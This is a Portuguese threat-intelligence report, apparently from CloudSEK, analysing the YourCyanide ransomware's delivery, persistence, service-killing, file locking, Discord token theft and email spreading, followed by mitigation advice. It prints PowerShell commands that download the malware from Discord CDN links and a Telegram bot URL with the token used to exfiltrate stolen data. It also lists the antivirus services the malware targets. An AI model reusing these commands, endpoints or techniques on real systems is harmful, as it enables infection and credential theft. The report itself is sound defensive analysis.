Receba as últimas notícias, ameaças e recursos do setor.
Autores: Anandeshwar Unnikrishnan, Rishika Desai, Benila Susan Jacob
Sumário executivo
CloudSEKda plataforma contextual de monitoramento de risco digital de IA XV Vigília deparei com a cepa de ransomware baseada em CMD YourCyanide sendo explorada na natureza. O YourCyanide usa o Discord, o Microsoft Office e o Pastebin como parte de seu mecanismo de download de carga útil, fazendo anexos do Discord e solicitações de URL.
Uma análise dos impactos do ransomware revela que ele pode ser utilizado para comprometer detalhes comerciais confidenciais, práticas e IP. Também existe um risco potencial de aquisição ou encerramento das operações da empresa, resultando em perda de receita e reputação.
As medidas de mitigação consistem em auditar e monitorar registros de eventos e incidentes para identificar padrões e comportamentos incomuns. Tem que haver um mecanismo sistemático para impor a proteção, recuperação e recuperação de dados. Além disso, configurações de segurança em dispositivos de infraestrutura de rede, como firewall e roteadores, precisam ser implementadas.
Análise e atribuição de YourCynaide
CloudSEKA equipe de pesquisa de ameaças da conduziu uma investigação sobre o novo e sofisticado ransomware 'YourCyanide', que está sendo explorado na natureza.
Essa variedade de ransomware baseada em CMD é distribuída principalmente como um anexo do Discord e faz solicitações de URL para o Microsoft Office e o Pastebin. Pesquisadores da Trend Micro descobriram que as raízes do YourCyanide remontam à família de ransomware GonnaCope, que surgiu pela primeira vez em abril de 2022.
A nota de resgate é despejada pelo malware em “YcynNote.txt”
Características do malware
A equipe de pesquisa de ameaças da CloudSEK descobriu os seguintes recursos do ransomware YourCyanide e de seus operadores:
O arquivo de execução do ransomware é entregue como um anexo do Discord, conforme mostrado abaixo:
Entrega de ransomware: (new-object net.webclient) .downloadfile (“https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe”, “GetToken.exe”)
Entrega de ransomware: (new-object net.webclient) .downloadfile (“https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe”, “NoKeyB.exe”)
O arquivo ofuscado de YourCyanide, quando desofuscado, busca o executável GetToken.exe.
O ransomware criptografa arquivos e os renomeia com uma extensão.cyn.
O arquivo.cmd do módulo YourCyanide é descartado por outro arquivo malicioso CaffeJuice.exe.
O caminho da nota de resgate é C:\Users\Admin\Desktop\YcynNote.txt.
Nota sobre o ransomware YourCyanide
O agente da ameaça compartilha seu nome, endereço da carteira BTC, canal de contato e número de arquivos criptografados na nota de resgate.
O grupo de ransomware geralmente exige USD 500 de suas vítimas para restaurar seus arquivos.
Associação com APT/outros grupos de ransomware
A amostra YourCyanide disponível indica que pode ser uma variante do ransomware Kekpop (também conhecido como Kekware); o ransomware descarta um arquivo 'other.txt' que menciona o Kekpop. Nossa pesquisa também confirma que o mesmo executável Get.exe é usado para entregar o ransomware Kekpop e YourCyanide.
Um dos arquivos que são descartados durante o ataque de ransomware YourCyanide
Outra semelhança que liga Kekpop e YourCyanide é o arquivo 'black.bat' que é descartado em ambas as instâncias.
Análise técnica do YourCyanide Ransomware
Execução inicial
Fluxograma do ataque
Um arquivo LNK malicioso “powershell.exe.lnk” executa um comando Powershell que recupera o executável “YourCyanide.exe” do servidor Discord e o executa no sistema da vítima para iniciar o ransomware YourCyanide.
O binário malicioso YourCyanide.exe, baixado pelo arquivo LNK, atua como um dropper de ransomware. Ele executa as seguintes operações no sistema:
O YourCyanide.exe cria um novo diretório “IXP000.TMP” no diretório temporário do usuário.
Ele despeja YourCyanide.cmd no diretório recém-criado. O conteúdo do arquivo é mostrado na imagem a seguir.
O dropper executa o script em lote para buscar o conteúdo do Pastebin e o salva como YourCyanide.cmd, que é o ransomware real escrito em script em lote.
Conteúdo do arquivo
Antes de sair, o dropper exclui o arquivo descartado e o diretório em Temp.
Persistência
O principal código de ransomware obtido do Pastebin está fortemente ofuscado com várias camadas de substituições e fatias de strings, para impedir sua análise ou detecção.
Código de ransomware
Uma análise mais aprofundada do código desofuscado mostra que o programa em lote define seu sistema e seus atributos ocultos, conforme mostrado abaixo:
Imagem do programa em lote
O atributo oculto, quando definido, oculta o arquivo correspondente do usuário, enquanto o atributo do sistema engana o sistema operacional para tratar o arquivo como crucial. Assim, no caso de alteração ou exclusão, esses arquivos permanecem inalterados, de forma semelhante aos arquivos do sistema.
O malware atinge a persistência por meio dos seguintes pontos de extensibilidade do AutoStart:
Executar chave de registro
Pasta de inicialização
Processo de criptografia
O malware cria um novo valor “rundll32_474_toolbar” em Run Key no registro e fornece o nome do arquivo em lote malicioso como dados para a nova entrada do registro. Finalmente, uma cópia do malware é salva na pasta Startup. Quando o malware atinge a persistência, ele cria um novo arquivo em lote “AuToexEc.BAT” na unidade C:\.
O arquivo BAT consiste no comando para iniciar um novo processo da mesma cópia do malware. Posteriormente, o Gerenciador de Tarefas é desativado por meio do registro. Todas essas operações são mostradas na imagem abaixo.
Gerenciador de tarefas desativado
O malware também verifica a existência de AUTOEXEC.BAT no sistema da vítima. E se encontrado, ele é substituído por si mesmo, conforme mostrado abaixo. No antigo sistema DOS, o AUTOEXEC.BAT era usado como um mecanismo de execução automática, após a inicialização do sistema.
Autoexec.bat
Além disso, o ransomware verifica o ambiente de análise verificando o nome de usuário. Esses nomes de usuário são todos retirados de sandboxes populares na Internet. O malware sai do sistema se o nome de usuário corresponder a qualquer um dos nomes de usuário mencionados no código abaixo.
Correspondência de nome
Um arquivo chamado “black.bat” é colocado no diretório de documentos do usuário. O conteúdo é gravado dinamicamente no lote descartado, conforme mostrado abaixo. O arquivo em lote descartado executa um protetor de tela preto chamando o arquivo scrnsave.scr. A execução do arquivo faz com que a tela do usuário fique em branco.
Black.bat
Serviços de destino
O malware encerra os seguintes serviços no sistema de destino:
Serviços direcionados
WinDefend
Wuauserv
Serviço Norton AntiVirus Firewall Monitor
Gerenciador de atualizações do McAfee SecurityCenter
crmonsvc
CCSetMgr
Serviço de drivers de rede da Symantec
Serviço MPF
helpsvc
*Symantec*
Symantec Core LC
Serviço Norton AntiVirus Auto Protect
Servidor Norton AntiVirus
McShield
em Ort
Cliente Norton AntiVirus
Firewall pessoal PC-cillin
Mecanismo em tempo real do McAfee.com VirusScan Online
Antivírus Sophos
Servidor eTrust Antivirus em tempo real
net stop netsvcs
Centro de segurança
Atualizações automáticas
Servidor McAfee Spamkiller
Symantec SPBbcSvc
MonsVCNT
CCevtMgr
Proteção Norton Unerase
mcupdmgr.exe
ErSvc
*McAfee*
navapsvc
Cliente Norton AntiVirus
Alerta NAV
DefWatch
InoTask
Edição Corporativa do Norton AntiVirus
Serviço Trend Micro Proxy
Serviço Sygate
Rede de antivírus Sophos
Sygate Personal Firewall Pro
Spoolnt
Symantec Core LC
Sav Scan
Serviço McAfee Personal Firewall
Agendador de tarefas do Ahnlab
Serviço nProtect
serviço sr
Serviço MSK
McAfee AntiSpyware
*norton*
CCPWDSvc
Serv-U
Cliente Symantec AntiVirus
Nav Auto-Protect
registro de eventos
Serviço Norton AntiVirus Auto Protect
Monitoramento profissional ViRobot
McAfee.com McShield
Sygate Personal Firewall Pro
Servidor de tarefas do eTrust Antivirus
Servidor RPC eTrust Antivirus
Tarefas
O malware encerra os seguintes processos em execução no sistema:
Processos em execução direcionados
MSASCui.exe
Excel
Acesso incompleto
Perspectiva
Firefox
Eu exploro
iTunes
Safari
tskill WINWORD
Fio de limão
Msnmsgr
Calc
Mspaint
Msnmsgr
Manipulação de dados
Depois de encerrar vários serviços de proteção e executar tarefas, o malware bloqueia os dados no sistema de destino, conforme mostrado abaixo. Os seguintes diretórios e seus subdiretórios são percorridos para realizar o bloqueio:
Desktop
Documentos
Música
Imagens
Vídeos
Downloads
Bloqueio de dados nos sistemas de destino
Os arquivos são renomeados para um número aleatório obtido da multiplicação de números aleatórios, seguido pelo qual uma extensão de “cyn” é anexada. Depois que os arquivos são renomeados, dados aleatórios são gravados no arquivo do usuário.
O malware libera outro arquivo em lote chamado “2b2crypt.cmd” para bloquear os dados relacionados ao Minecraft, conforme mostrado abaixo. A lógica usada para o bloqueio é a mesma vista antes. Os diretórios “.minecraft” e “.minecraft\ mods” são alvo do malware, conforme mostrado abaixo. Depois de gravar o conteúdo do arquivo em lote, ele é executado para iniciar o bloqueio dos dados.
2b2crypt.cmd para dados relacionados ao minecraft
O script Logger
Usando o Powershell, o malware recupera outro arquivo em lote “ycynlog.cmd” e o executa no sistema de destino.
Arquivo em lote Ycynlog.cmd executado
O “ycynlog.cmd” está fortemente ofuscado com a mesma lógica usada para o arquivo de lote principal do ransomware. As instruções em lote hospedadas no Pastebin são mostradas abaixo. Esse script malicioso atua como um registrador de dados do usuário e envia os dados para um bot do Telegram (https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument? chat_id=-655682538).
Imagem das operações
O script ycynlog.cmd, assim como o script principal de ransomware, inicia a execução definindo Executar chaves de registro para obter persistência no sistema de destino e também descarta o arquivo ycynlog.cmd na pasta Startup.
O script do registrador baixa um arquivo executável adicional hospedado em CDN do Discord e o executa no sistema.
GetToken binário
GetToken é um programa C#/.NET usado para roubar os tokens do Discord dos usuários. O ladrão contém caminhos de diretório codificados para o Discord e o armazenamento local de vários navegadores da web, conforme mostrado na imagem abaixo.
Imagem GetToken
Os tokens são identificados usando a correspondência de padrões Regex, conforme mostrado abaixo. Se uma correspondência for encontrada, o ladrão verifica a validade do token chamando a função tokenUtil.checkToken.
operações de token tokenutil.check
A validade do token é realizada conectando-se ao servidor Discord e monitorando a resposta do servidor. A rotina de verificação do token é mostrada abaixo. Os tokens válidos são retornados para a função chamadora.
Rotina de verificação de tokens
O ladrão cria um arquivo Tokens.txt no sistema da vítima e despeja todos os tokens válidos encontrados. Se não houver tokens presentes, o valor que será gravado em Tokens.txt será “Retard Has No Tokens”. O ransomware finalmente envia o Token.txt para o bot do Telegram.
Imagem das operações
O endereço IP global da vítima é recuperado enviando uma solicitação para https://ipv4.wtfismyip.com/text por meio de curl e a saída é armazenada como IP.txt.
O script recupera uma lista de aplicativos instalados no sistema e a armazena em apps.txt para enviá-la posteriormente ao bot do Telegram.
O WMI é usado extensivamente para recuperar informações do usuário no nível do sistema. A lista a seguir resume os dados enumerados pelo script:
Nome de usuário
Endereço IP (local)
Dados de configuração de rede
Informações do MAC
Dados da CPU
Dados de memória física
Informações do disco, como detalhes da partição
Informações do sistema Windows
Informações de licença do Windows (chave do produto)
Os dados acima, juntamente com o Tokens.txt gerado pelo GetToken.exe, são enviados para o bot do Telegram. Além disso, os scripts do registrador roubam os seguintes dados específicos do usuário do Minecraft:
Imagem das operações
Launcher_msa_credentials.bin
Launcher_msa_credentials_microsoft_store.bin
launcher_accounts.json
Launcher_accounts_Microsoft_Store.json
launcher_product_state.json
launcher_profiles.json
Usando o Powershell, o script do registrador baixa o ForMe.txt de Nuvem do Google e o executa no sistema.
Imagem das operações
O ForMe.exe despeja dados no ForMe.txt, que posteriormente são enviados para o bot do Telegram. Infelizmente, no momento de nossa análise, o link do Google Cloud não exibia o arquivo. Nossa pesquisa indica que ele pode ser um ladrão de senhas de navegador.
O script de ransomware então descarta um arquivo em lote chamado “fuckports.cmd”. As instruções para adicionar regras de firewall personalizadas são escritas no arquivo batch, conforme mostrado abaixo. As regras de firewall a seguir permitem tráfego UDP de entrada para a porta 2835 e tráfego UDP de saída até 16981.
Arquivo em lote Fuckports.cmd descartado
O malware se adiciona aos arquivos win.ini e system.ini. Esses arquivos contêm arquivos de configuração para iniciar programas e outras configurações após a inicialização do sistema. O malware elimina dois arquivos em lote, “confession.bat” e “Check This Out.bat”, que têm finalidades idênticas.
confession.bat
checkthisout.bat
YourCyanide também é capaz de se espalhar pelo correio. Ele utiliza APIs do Visual Basic para se comunicar com o Microsoft Outlook e envia uma cópia de si mesmo como anexo de e-mail. O malware então coloca “loveletter.vbs” no diretório Documents.
O script VB recupera a lista de endereços do usuário e envia um e-mail com o assunto “Estou apaixonado por você” e uma mensagem que diz “leia-me”. O anexo do e-mail contém uma cópia do programa em lote de ransomware.
Carta de amor
Coleção Ransom
O malware descarta um arquivo vbs adicional chamado “mail.vbs” com o mesmo conteúdo mencionado acima. No entanto, ele enviará um e-mail com o assunto “Confira isso”.
Confira isso
O ransomware usa o comando Powershell Out-Printer para imprimir várias cópias da nota de resgate.
Nota de resgate
O malware também se copia para outras unidades presentes no sistema, conforme mostrado abaixo:
Copiando a si mesmo para outras unidades
Notavelmente, o YouCyanide altera a associação de arquivos de vbs, sln, js, css e ini. Ao abrir esses arquivos, o sistema transfere seu controle para um programa associado. O malware associa os tipos de arquivo listados a si mesmo. O malware é executado quando tipos de arquivos semelhantes são abertos.
Lista de arquivos associados
O malware ativa a área de trabalho remota no sistema de destino, conforme mostrado abaixo, e inicia o TermService ou serviço de terminal, responsável por lidar com as tarefas relacionadas ao RDP.
Serviço de terminal
Finalmente, a nota de resgate é exibida para o usuário e cria uma configuração de execução automática para as unidades disponíveis no sistema que leva à execução do próprio malware, conforme mostrado abaixo.
Impacto e mitigação
ImpactoMitigação
As credenciais roubadas podem permitir o acesso às redes da organização.
As informações de identificação pessoal (PII) expostas podem ser usadas para orquestrar esquemas de engenharia social, ataques de phishing e até mesmo roubo de identidade.
As credenciais expostas podem ser aproveitadas para acessar outras contas dos usuários, devido à reutilização de senhas.
Os dados expostos podem revelar práticas comerciais e propriedade intelectual.
Use inteligência proativa contra ameaças para prevenir e alertar os usuários sobre possíveis ameaças e fortalecer a postura de segurança externa.
Redefina as credenciais de login comprometidas e implemente uma política de senha forte para contas de usuário.
Use MFA (autenticação multifator) em todos os logins.
Verifique as possíveis soluções alternativas e corrija todos os endpoints vulneráveis e exploráveis, mantendo as portas abertas.
Monitore anomalias que possam ser indicadores de possíveis aquisições.